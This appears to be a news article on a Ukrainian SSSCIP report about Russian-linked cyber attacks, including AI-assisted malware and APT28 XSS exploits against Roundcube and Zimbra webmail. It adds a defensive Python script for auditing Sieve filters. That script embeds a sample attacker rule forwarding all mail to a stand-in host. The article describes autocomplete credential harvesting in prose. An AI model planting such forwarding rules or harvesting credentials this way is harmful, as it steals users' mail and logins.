Ukraine’s State Service for Special Communications and Information Protection (SSSCIP) said Russian-linked hackers increased their use of artificial intelligence in cyber attacks in the first half of 2025, and that the agency recorded 3,018 incidents in that period, up from 2,575 in the second half of 2024.
The agency said attackers are employing AI not only to craft phishing messages but also to write malware: some samples show signs of having been generated with AI tools. SSSCIP highlighted an attack cluster it attributed to UAC-0219 that used a PowerShell data-stealing malware called WRECKSTEEL, saying there is evidence the sample was developed with AI assistance.
SSSCIP reported that attacks against local authorities and military entities increased compared with the second half of 2024, while incidents targeting government and energy sectors declined. The report catalogued multiple phishing campaigns attributed to different subgroups that used booby-trapped RAR archives, credential stealers and backdoors, naming families such as HOMESTEEL, GIFTEDCROOK, Amatera Stealer, Strela Stealer and a C# backdoor known as Kalambur.
The agency also said Russia-linked APT28 exploited cross-site scripting (XSS) and other flaws in Roundcube and Zimbra webmail software to carry out zero-click compromises: merely opening a crafted message ran attacker script in the victim's webmail session, which then called the webmail's own APIs to harvest credentials and contact lists and to create mail filters that forward incoming email to attacker-controlled mailboxes. SSSCIP described a further technique in which the injected script created a hidden HTML form block with autocomplete enabled, so that the browser filled in saved credentials that the script could then exfiltrate.
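Both Roundcube (via managesieve) and Zimbra store user mail filters as Sieve scripts, so a practical post-compromise check is to audit each mailbox's Sieve rules for redirect actions to external domains. The script below is an added example written for this page, not tooling from SSSCIP or from either webmail project. The Sieve text it scans is constructed here to mimic a Roundcube-style script containing one benign rule and one attacker-style catch-all forward; the internal domain list is an assumed parameter the operator supplies.

```python
import re
from typing import Dict, List

# Constructed sample Sieve script (not from the report). Roundcube emits
# "# rule:[name]" comments before each rule; attackers often leave the
# name blank or meaningless and forward everything with ":copy" so the
# victim still sees the original mail in the inbox.
SAMPLE_SIEVE = """require ["fileinto", "copy"];
# rule:[newsletters]
if header :contains "from" "news@example.org"
{
    fileinto "Newsletters";
}
# rule:[.]
if true
{
    redirect :copy "collector@evil-example.net";
}
"""

# redirect [:copy] [:list] "address"  -- options are optional tagged args
REDIRECT_RE = re.compile(
    r'\bredirect\b(?P<opts>(?:\s+:\w+)*)\s+"(?P<addr>[^"]+)"', re.IGNORECASE
)
# A test of "if true" / "elsif true" forwards every message (catch-all).
CATCH_ALL_RE = re.compile(r"^(if|elsif)\s+true\b", re.IGNORECASE)


def audit_sieve(script: str, internal_domains: List[str]) -> List[Dict[str, object]]:
    """Return one finding per redirect action found in a Sieve script.

    Each finding records the target address, whether its domain is outside
    the organisation, whether ":copy" keeps a silent copy for the victim,
    and whether the enclosing rule is an unconditional catch-all.
    """
    allowed = {d.lower() for d in internal_domains}
    findings: List[Dict[str, object]] = []
    catch_all = False  # state of the most recent if/elsif test seen

    for lineno, line in enumerate(script.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # comments, including Roundcube rule-name markers
        if re.match(r"^(if|elsif)\b", stripped, re.IGNORECASE):
            catch_all = bool(CATCH_ALL_RE.match(stripped))
        for m in REDIRECT_RE.finditer(line):
            addr = m.group("addr")
            domain = addr.rsplit("@", 1)[-1].lower()
            findings.append(
                {
                    "line": lineno,
                    "address": addr,
                    "domain": domain,
                    "external": domain not in allowed,
                    "keeps_copy": ":copy" in m.group("opts").lower(),
                    "catch_all": catch_all,
                }
            )
    return findings


def suspicious(findings: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Filter to the redirects an incident responder should look at first."""
    return [f for f in findings if f["external"]]


if __name__ == "__main__":
    for f in suspicious(audit_sieve(SAMPLE_SIEVE, ["example.org"])):
        flags = [k for k in ("keeps_copy", "catch_all") if f[k]]
        print(f"line {f['line']}: redirect to {f['address']} ({', '.join(flags) or 'plain'})")
```

This is a regex triage aid rather than a full Sieve parser: it will miss redirects assembled from variables or split across lines, so treat an empty result as "nothing obvious", not as a clean bill of health. The same logic applies to forwarding set through Zimbra's account preferences, which also lands in the user's Sieve script.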
SSSCIP said the Sandworm group continued operations against energy, defence, internet service providers and research organisations, and that several threat groups increasingly abused legitimate cloud and hosting services (including Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io and mocky.io) to host malware or phishing pages and to exfiltrate data, since traffic to such services blends in with normal use and is rarely blocked outright.